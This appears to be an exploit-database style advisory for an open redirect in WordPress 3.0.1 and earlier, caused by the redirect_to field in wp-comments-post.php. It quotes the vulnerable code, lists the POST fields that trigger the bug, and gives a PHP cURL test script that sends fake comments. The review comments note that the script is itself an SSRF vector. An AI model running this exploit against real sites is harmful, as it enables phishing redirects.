#Title: WordPress (Version 3.0.1 And Prior) Url Redirection Bug
#Vendor: http://wordpress.org/download/
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability65.htm
#Thanks: Amin Shokohi(Pejvak),M3hr@n$,r3dm0v3,am!rkh@n Particular Hookah(Dosib) :D
######################################################################
PoC: lines 94-98 of wordpress/wp-comments-post.php

$location = empty($_POST['redirect_to']) ? get_comment_link($comment_id) : $_POST['redirect_to'] . '#comment-' . $comment_id;
*The variable $location is set directly from $_POST['redirect_to']*

$location = apply_filters('comment_post_redirect', $location, $comment);
*WordPress redirect function*

wp_redirect($location);
*Redirects to $location (taken from the request without validation)*
######################################################################
PoC 2: Usage. This bug is triggered with a POST request.

POST fields:
comment_post_ID=1 //Post ID; if it is wrong the bug does not work
email=emal@yahoo.com //Fake email address
author=pejipeji //Fake author name
comment=Hi //Fake comment
redirect_to=http://www.itsecteam.com //URL to redirect to
######################################################################
*Note: if post_ID is wrong the bug does not work
######################################################################
#Bug : http://localhost/wordpress/wp-comments-post.php
######################################################################
Exploit For Test :
Wordpress Vulnerability Url Redirection Test
ItSecTeam.com
Url :
";
// End of the HTML string echoed above; its opening quote lies before this excerpt.
if($_POST['url']){
    // NOTE(review): $_POST['url'] is read without isset() (undefined-index notice when
    // absent) and used unvalidated as the cURL target, so this test page is itself an
    // SSRF vector if left on a reachable host.
    $ch = curl_init($_POST['url']."/wp-comments-post.php");
    // Comment-submission body; redirect_to is the field wp-comments-post.php hands to
    // wp_redirect(). The rand() suffixes presumably vary the comment per run — unconfirmed.
    curl_setopt($ch, CURLOPT_POSTFIELDS, "comment_post_ID=1&email=pejipeji".rand(1,9999)."@yahoo.com&author=pejipeji".rand(1,9999)."&comment=Hi".rand(1,9999)."&redirect_to=http://www.itsecteam.com");
    // Follow the Location header so curl_getinfo() reports the final URL.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    // Response headers are included in the returned body; body is returned, not printed.
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // $response is never used; curl_exec() errors (false) are not checked.
    $response = curl_exec($ch);
    // Dead assignment: overwritten on the next line.
    $info=null;
    $info =curl_getinfo($ch);
    // Prints the URL cURL ended on: the redirect_to value if the site honoured it,
    // otherwise wherever the site redirected instead. The handle is never curl_close()d.
    echo $info['url'];
}
?>